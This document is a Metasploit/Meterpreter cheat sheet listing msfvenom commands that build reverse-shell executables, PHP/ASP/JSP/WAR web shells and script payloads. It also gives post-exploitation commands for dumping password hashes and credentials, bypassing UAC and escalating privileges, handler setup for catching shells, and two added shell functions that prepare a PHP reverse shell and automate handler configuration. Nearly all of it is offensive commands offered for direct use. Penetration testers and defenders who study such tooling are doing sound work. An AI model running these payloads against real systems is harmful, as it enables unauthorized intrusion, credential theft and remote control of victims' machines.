Meterpreter Cheat Sheet
Windows reverse meterpreter payload

| Command | Description |
|---|---|
| `set payload windows/meterpreter/reverse_tcp` | Windows reverse TCP Meterpreter payload |

Windows VNC Meterpreter payload

| Command | Description |
|---|---|
| `set payload windows/vncinject/reverse_tcp` | Meterpreter Windows VNC payload |
| `set ViewOnly false` | Allow interaction with the VNC session instead of view-only |

Linux Reverse Meterpreter payload

| Command | Description |
|---|---|
| `set payload linux/meterpreter/reverse_tcp` | Meterpreter Linux reverse payload |
Meterpreter Cheat Sheet

| Command | Description |
|---|---|
| `upload file c:\\windows` | Upload a file to the Windows target |
| `download c:\\windows\\repair\\sam /tmp` | Download a file from the Windows target |
| `execute -f c:\\windows\\temp\\exploit.exe` | Run an .exe on the target, handy for executing uploaded exploits |
| `execute -f cmd -c` | Create a new channel with a cmd shell |
| `ps` | Show processes |
| `shell` | Get a shell on the target |
| `getsystem` | Attempt privilege escalation to SYSTEM on the target |
| `hashdump` | Attempt to dump the password hashes on the target (requires SYSTEM privileges; try migrating into a SYSTEM process such as winlogon.exe first) |
| `portfwd add -l 3389 -p 3389 -r target` | Create a port forward to the target machine |
| `portfwd delete -l 3389 -p 3389 -r target` | Delete the port forward |
| `use exploit/windows/local/bypassuac` | Bypass UAC on Windows 7 and later; set the target and architecture (x86/x64) to match the session |
| `use auxiliary/scanner/http/dir_scanner` | Metasploit HTTP directory scanner |
| `use auxiliary/scanner/http/jboss_vulnscan` | Metasploit JBoss vulnerability scanner |
| `use auxiliary/scanner/mssql/mssql_login` | Metasploit MSSQL credential scanner |
| `use auxiliary/scanner/mysql/mysql_version` | Metasploit MySQL version scanner |
| `use auxiliary/scanner/oracle/oracle_login` | Metasploit Oracle login module |
| `use exploit/multi/script/web_delivery` | Metasploit PowerShell payload delivery module |
| `run post/windows/manage/powershell/exec_powershell` | Upload and run a PowerShell script through a session |
| `use exploit/multi/http/jboss_maindeployer` | Metasploit JBoss deploy |
| `use exploit/windows/mssql/mssql_payload` | Metasploit MSSQL payload |
| `run post/windows/gather/win_privs` | Show the privileges of the current user |
| `use post/windows/gather/credentials/gpp` | Grab GPP saved passwords |
| `load kiwi` | Load the Mimikatz/kiwi extension |
| `creds_all` | Dump credentials with kiwi |
| `run post/windows/gather/local_admin_search_enum` | Identify other machines that the supplied domain user has administrative access to |
| `set AUTORUNSCRIPT post/windows/manage/migrate` | Automatically run the migrate post module as soon as a new session opens |
Meterpreter Payloads

| Command | Description |
|---|---|
| `msfvenom -l` | List available modules by type, e.g. `msfvenom -l payloads` |

Binaries

| Platform | Command |
|---|---|
| Linux | `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf` |
| Windows | `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe` |
| Mac | `msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho` |
Web Payloads

| Type | Command |
|---|---|
| PHP | `msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php` |
| PHP listener | `set payload php/meterpreter/reverse_tcp` |
| PHP (prepend the open tag, which msfvenom's raw output leaves commented out) | `cat shell.php \| pbcopy && echo '<?php ' \| tr -d '\n' > shell.php && pbpaste >> shell.php` |
| ASP | `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp` |
| JSP | `msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp` |
| WAR | `msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war` |
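The pbcopy/pbpaste one-liner above only works on macOS. The following is an added example, not part of the original cheat sheet: a portable POSIX shell function that does the same job (prepends a real `<?php` tag, because msfvenom's raw PHP output begins with the tag commented out as `/*<?php /**/`) and is safe to run twice. The function name `prepend_php_tag` and the sample payload line are my own constructed choices.

```shell
# Added example (not from the original cheat sheet): portable replacement for the
# pbcopy/pbpaste trick. msfvenom's raw PHP output starts "/*<?php /**/ ...", so
# the web server will not execute it until a real "<?php" tag is prepended.
prepend_php_tag() {
    file="$1"    # path to the raw msfvenom PHP payload, modified in place
    case "$(head -n 1 "$file")" in
        '<?php'*) return 0 ;;    # already has a real open tag, leave it alone
    esac
    tmp="$(mktemp)"
    printf '<?php ' > "$tmp"     # same text the pbcopy one-liner prepends
    cat "$file" >> "$tmp"
    mv "$tmp" "$file"
}

# Usage on a constructed stand-in for msfvenom output (real output is much longer):
sample="$(mktemp)"
printf '/*<?php /**/ error_reporting(0); $ip = "10.0.0.1"; $port = 4444;\n' > "$sample"
prepend_php_tag "$sample"
head -n 1 "$sample"
```

Because the original `/*<?php /**/` prefix is left in place, the result is still valid PHP: the commented-out tag becomes an ordinary comment after the real one.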
Scripting Payloads

| Language | Command |
|---|---|
| Python | `msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py` |
| Bash | `msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh` |
| Perl | `msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl` |
Shellcode

For all shellcode, see `msfvenom --help-formats` for the valid output formats. msfvenom will emit the shellcode as source in the chosen language so it can be cut and pasted into your exploits.

| Platform | Command |
|---|---|
| Linux | `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f <format>` |
| Windows | `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f <format>` |
| Mac | `msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f <format>` |
Handlers

Metasploit handlers are a quick way to get Metasploit into position to receive your incoming shells. A handler should be set up in msfconsole in the following form:

```
use exploit/multi/handler
set PAYLOAD <payload>
set LHOST <attacker IP>
set LPORT <port>
set ExitOnSession false
exploit -j -z
```

An example is to build the payload with msfvenom, then start a handler for it. The handler's PAYLOAD, LHOST and LPORT must match the values the payload was generated with (a staged `windows/meterpreter/reverse_tcp` payload will not connect back to a handler configured for the stageless `windows/meterpreter_reverse_tcp`, and vice versa):

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f <format> > exploit.extension
```

```
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
```
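Added example, not part of the original cheat sheet: a small POSIX shell function that writes the handler recipe above to a resource script for `msfconsole -r` and prints the matching msfvenom command, so the payload, LHOST and LPORT on both sides are taken from one place and cannot drift apart. The function name `make_handler`, the default file name `handler.rc` and the sample values (10.0.0.5, port 4444) are my own constructed choices.

```shell
# Added example (not from the original cheat sheet): generate an msfconsole
# resource script for exploit/multi/handler and the matching msfvenom command.
# Usage: make_handler PAYLOAD LHOST LPORT [FORMAT] [OUTFILE]
make_handler() {
    payload="$1"; lhost="$2"; lport="$3"
    fmt="${4:-exe}"; out="${5:-handler.rc}"
    # Reject a non-numeric port before writing anything
    case "$lport" in
        ''|*[!0-9]*) echo "LPORT must be numeric" >&2; return 1 ;;
    esac
    # Resource script: one msfconsole command per line, run with msfconsole -r
    cat > "$out" <<EOF
use exploit/multi/handler
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
    # Same payload string on the msfvenom side (staged vs stageless must match)
    echo "msfvenom -p $payload LHOST=$lhost LPORT=$lport -f $fmt > shell.$fmt"
}

# Example run with constructed values; writes the resource script to a temp file
rc="$(mktemp)"
make_handler windows/meterpreter/reverse_tcp 10.0.0.5 4444 exe "$rc"
echo "handler resource script written to $rc (start it with: msfconsole -q -r $rc)"
```

`exploit -j -z` runs the handler as a background job without interacting with the first session, and `ExitOnSession false` keeps it listening for further callbacks from the same payload.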